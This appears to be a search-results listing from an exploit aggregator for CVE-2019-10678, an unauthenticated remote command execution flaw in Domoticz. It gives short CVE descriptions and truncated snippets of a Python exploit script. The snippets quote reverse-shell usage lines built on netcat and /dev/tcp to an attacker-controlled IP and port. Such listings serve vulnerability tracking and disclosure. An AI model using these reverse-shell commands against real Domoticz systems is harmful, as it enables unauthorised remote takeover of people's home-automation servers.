6 matches found
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Domoticz 4.10577 Unauthenticated Remote Command Execution
!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...
CVE-2019-10678
creationtimestamp| type| source ---|---|--- 2019-04-30 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/46773...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...
CVE-2019-10678
Domoticz before 4.10579 neglects to categorize \n and \r as insecure argument options...
CVE-2019-10678
CVE-2019-10678 affects Domoticz prior to 4.10579. The root cause is improper categorization of newline and carriage return characters as insecure argument options, enabling the potential for unauthenticated command execution given available exploits for Domoticz